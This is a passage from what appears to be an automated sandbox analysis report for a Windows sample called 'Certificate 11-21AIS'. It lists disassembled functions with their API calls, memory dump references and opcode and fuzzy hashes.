                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                              • API String ID: 2574300362-1816364905
                                                                              • Opcode ID: fc76c531ed9662e3a2c4a88612a0e5cd2e6b4c0a800226823628557b8e31701a
                                                                              • Instruction ID: 86caf2c8062d0caaf561fc9b19c3f3c45e610a6a409addc10682fac85ba8d88d
                                                                              • Opcode Fuzzy Hash: fc76c531ed9662e3a2c4a88612a0e5cd2e6b4c0a800226823628557b8e31701a
                                                                              • Instruction Fuzzy Hash: 55D0A7396187239FDB245F61EC48A4276E8AF46304B00C419FC89D2151EB70C8C0EB50
                                                                              Function 0091BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0091BAD3,00000001,0091B6EE,?,0095DC00), ref: 0091BAEB
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0091BAFD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                              • API String ID: 2574300362-199464113
                                                                              • Opcode ID: 3cc8e0d1478738d7aa5bf637ea5e1c3267ffe44dafb84d2074aba69f7b379818
                                                                              • Instruction ID: 05ba69dad0ee18e7fab2c342052223001d39b78fe4af20d16525bde0b909d8f1
                                                                              • Opcode Fuzzy Hash: 3cc8e0d1478738d7aa5bf637ea5e1c3267ffe44dafb84d2074aba69f7b379818
                                                                              • Instruction Fuzzy Hash: A0D0A739A5C7129FC7345F21EC48F5176E8AF05304B108419FC47D2550E770C8C0C710
                                                                              Function 00923BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00923BD1,?,00923E06), ref: 00923BE9
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00923BFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 2574300362-4033151799
                                                                              • Opcode ID: 090b89436d1a1e6288758e75354ece58a3d830fe94bae312dd9f3ba5f0940075
                                                                              • Instruction ID: 1f8056fc71bc892c9517eb7d4758f4b68918d8f70924960dd6c9572ef6027969
                                                                              • Opcode Fuzzy Hash: 090b89436d1a1e6288758e75354ece58a3d830fe94bae312dd9f3ba5f0940075
                                                                              • Instruction Fuzzy Hash: CFD0A779619762AFC7209F60F808A03BAF8AB06318B10C41DEC89E2250E7B4C480CE10
                                                                              Function 008F9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57f9a686702cd43a4d388579834879673aed55c6083899dbabc4c57cdf086a34
                                                                              • Instruction ID: 209c72f6da4ee2509483413f91652f9e50f42ae905f395dd3e93a8c0537e9675
                                                                              • Opcode Fuzzy Hash: 57f9a686702cd43a4d388579834879673aed55c6083899dbabc4c57cdf086a34
                                                                              • Instruction Fuzzy Hash: D4C13975A0021AEBCB14DFA4C884BBEB7B5FF48704F204599EA45EB251D7709E41DBA0
                                                                              Function 0091AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 0091AAB4
                                                                              • CoUninitialize.OLE32 ref: 0091AABF
                                                                                • Part of subcall function 00900213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0090027B
                                                                              • VariantInit.OLEAUT32(?), ref: 0091AACA
                                                                              • VariantClear.OLEAUT32(?), ref: 0091AD9D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                              • String ID:
                                                                              • API String ID: 780911581-0
                                                                              • Opcode ID: d188966c98a016e9465dd96b729d9be6a8c275027f3b1a226f55abfa1de2c131
                                                                              • Instruction ID: 312fec75ba9ae7a8fca5fded228c76dc194863063a6e72f4a045aa6e30c9b7bb
                                                                              • Opcode Fuzzy Hash: d188966c98a016e9465dd96b729d9be6a8c275027f3b1a226f55abfa1de2c131
                                                                              • Instruction Fuzzy Hash: 2EA126752047059FCB10EF28C485B5AB7E5FF88710F144959F99A9B3A2CB34ED44CB86
                                                                              Function 008F91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                              • String ID:
                                                                              • API String ID: 2808897238-0
                                                                              • Opcode ID: 38b7f4f11d937305f3cab140bdd7f680a7ee630bde5a88e08b22592d4a992276
                                                                              • Instruction ID: 2c2f6dd660dcd55363d7ae3fb78270cbf23f6bd783bc5c6c01d52c8f688c9866
                                                                              • Opcode Fuzzy Hash: 38b7f4f11d937305f3cab140bdd7f680a7ee630bde5a88e08b22592d4a992276
                                                                              • Instruction Fuzzy Hash: 9F519434A0430ADBDB24AF799891B3EB3A9FF55318F20981FE686C73D1DB7198808705
                                                                              Function 008E365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 3877424927-0
                                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                              • Instruction ID: 4ab0c7688f4596a6b1554de967a502b0343f56ccbbf1a1ed5249d1e13f374a46
                                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                              • Instruction Fuzzy Hash: AF5195B0A00289ABDB248F7B8C8856E77B5FF52324F248639F825D72E0D7719F509B41
                                                                              Function 0092C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(00FC6818,?), ref: 0092C544
                                                                              • ScreenToClient.USER32(?,00000002), ref: 0092C574
                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0092C5DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientMoveRectScreen
                                                                              • String ID:
                                                                              • API String ID: 3880355969-0
                                                                              • Opcode ID: 8e86c832f7b90865d78bb2f31ae0fb190e1c7c3d4f2a5cf14684b56033eb5dd1
                                                                              • Instruction ID: d8d12aa2fefe24782c80b6332ef4793b37314ab9e23c578817c2da3d1ad135e7
                                                                              • Opcode Fuzzy Hash: 8e86c832f7b90865d78bb2f31ae0fb190e1c7c3d4f2a5cf14684b56033eb5dd1
                                                                              • Instruction Fuzzy Hash: 96515DB5904219EFCF20DF68D880EAE7BBAFB55320F108659F9559B294D730ED81CB90
                                                                              Function 008FC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 008FC462
                                                                              • __itow.LIBCMT ref: 008FC49C
                                                                                • Part of subcall function 008FC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 008FC753
                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 008FC505
                                                                              • __itow.LIBCMT ref: 008FC55A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: 453128176ae1b2ec8548a5d45dd8403980594482d86bdea8b41150107f80da6c
                                                                              • Instruction ID: 1b3415291ca9ecabb153a478879594285755b24cbe2887114b648539446cd0f0
                                                                              • Opcode Fuzzy Hash: 453128176ae1b2ec8548a5d45dd8403980594482d86bdea8b41150107f80da6c
                                                                              • Instruction Fuzzy Hash: DB415C71A0020CABDF15EF68C955FBE7BB9FB59700F000019FA05E7181DB70AA458BA6
                                                                              Function 0090390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00903966
                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00903982
                                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009039EF
                                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00903A4D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: a1bcf50d72a05e8fcfeb966ffbc134819e0480ae65c7181a333ad4da2719bdc9
                                                                              • Instruction ID: 9014244bfba3a5068128fd06133e0425811b603d11d75b310218d2b0c34c0b66
                                                                              • Opcode Fuzzy Hash: a1bcf50d72a05e8fcfeb966ffbc134819e0480ae65c7181a333ad4da2719bdc9
                                                                              • Instruction Fuzzy Hash: 1A412670A44208EEEF208B65C809BFDBBBDAB95310F04811AF4D1922C1CBB88E85D761
                                                                              Function 0090E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0090E742
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0090E768
                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0090E78D
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0090E7B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: 817178280210ee5c74518322334152b54173beb050941af6ca10b8f8070a2398
                                                                              • Instruction ID: 1cc1b257cf9ea5a16812f1cd80c1477d9bf504acd21f66a7b78c6b9bdfec4236
                                                                              • Opcode Fuzzy Hash: 817178280210ee5c74518322334152b54173beb050941af6ca10b8f8070a2398
                                                                              • Instruction Fuzzy Hash: 88411739600610DFCB11EF29C445A4DBBF5FF99720B098499E956AB3A2CB74FD40CB92
                                                                              Function 0092B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0092B5D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: b13e6dcde1ef06edffb15afd8e72eeeb3bacb85af18eb74fcf85cfdcae3ae156
                                                                              • Instruction ID: 0c806e0f1ad0c02068725c4b5c1c1a4d7bb6866a1279f6e6783b09f4ea51f2dc
                                                                              • Opcode Fuzzy Hash: b13e6dcde1ef06edffb15afd8e72eeeb3bacb85af18eb74fcf85cfdcae3ae156
                                                                              • Instruction Fuzzy Hash: 1431D478611224BFEF309F18EC89FAC77E9EB06320F644501FA51DA2E9D734E9409B51
                                                                              Function 0092D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 0092D807
                                                                              • GetWindowRect.USER32(?,?), ref: 0092D87D
                                                                              • PtInRect.USER32(?,?,0092ED5A), ref: 0092D88D
                                                                              • MessageBeep.USER32(00000000), ref: 0092D8FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: eaab53a82201e8501a6ea7a758b5eb6d8f5e3582652855e563fc1a17e325803d
                                                                              • Instruction ID: 5b21cc1892b5e5b5317e2fb66b47c590abca36c35137c610737a4471c686d2a2
                                                                              • Opcode Fuzzy Hash: eaab53a82201e8501a6ea7a758b5eb6d8f5e3582652855e563fc1a17e325803d
                                                                              • Instruction Fuzzy Hash: 8941BD78A06229DFCB11DF58E884FA97BF9FF49311F1881A9E4548B268D730E941DB40
                                                                              Function 00903A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00903AB8
                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00903AD4
                                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00903B34
                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00903B92
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: a6bb73f4407f1b34dd28677ee87e1dd9cc5d6e5b0abad8389c453be17641dda2
                                                                              • Instruction ID: 95696ae612d6fa0848ffce6ee25e6c0c93951cd81ccdf3cd15f6203270266e44
                                                                              • Opcode Fuzzy Hash: a6bb73f4407f1b34dd28677ee87e1dd9cc5d6e5b0abad8389c453be17641dda2
                                                                              • Instruction Fuzzy Hash: 82313830A44258AEEF308B64C819BFE7FBD9B56318F04815AF481A32D1C7788F45D761
                                                                              Function 008F4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008F4038
                                                                              • __isleadbyte_l.LIBCMT ref: 008F4066
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008F4094
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008F40CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: eafdbf0cfe4c8db5570b82a23dac01eb2e07ad0b05b7359c017e715d387d3d7d
                                                                              • Instruction ID: 0cad01581de5b71c7653974b7667faf27081755492da858cc5d09d50bb1159d9
                                                                              • Opcode Fuzzy Hash: eafdbf0cfe4c8db5570b82a23dac01eb2e07ad0b05b7359c017e715d387d3d7d
                                                                              • Instruction Fuzzy Hash: 3531D030604A4AAFDB219F75C844BBB7BB5FF81310F15542AEB61CB1A0EB31D890DB90
                                                                              Function 00927CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00927CB9
                                                                                • Part of subcall function 00905F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00905F6F
                                                                                • Part of subcall function 00905F55: GetCurrentThreadId.KERNEL32 ref: 00905F76
                                                                                • Part of subcall function 00905F55: AttachThreadInput.USER32(00000000,?,0090781F), ref: 00905F7D
                                                                              • GetCaretPos.USER32(?), ref: 00927CCA
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00927D03
                                                                              • GetForegroundWindow.USER32 ref: 00927D09
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: dd92d3b2655679fe4cfcf23bd37618889e7f663d0f0704da6349ccf41a8193b1
                                                                              • Instruction ID: 25490a16d97125dacfbd4a38137be30a9c599175aab6452fdb8f9a6b629a8784
                                                                              • Opcode Fuzzy Hash: dd92d3b2655679fe4cfcf23bd37618889e7f663d0f0704da6349ccf41a8193b1
                                                                              • Instruction Fuzzy Hash: 11313EB6900108AFCB00EFA9D8419EFFBF9EF94310B108566E815E3211DA309E01CBA1
                                                                              Function 0092F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • GetCursorPos.USER32(?), ref: 0092F211
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0093E4C0,?,?,?,?,?), ref: 0092F226
                                                                              • GetCursorPos.USER32(?), ref: 0092F270
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0093E4C0,?,?,?), ref: 0092F2A6
                                                                              Memory Dump Source
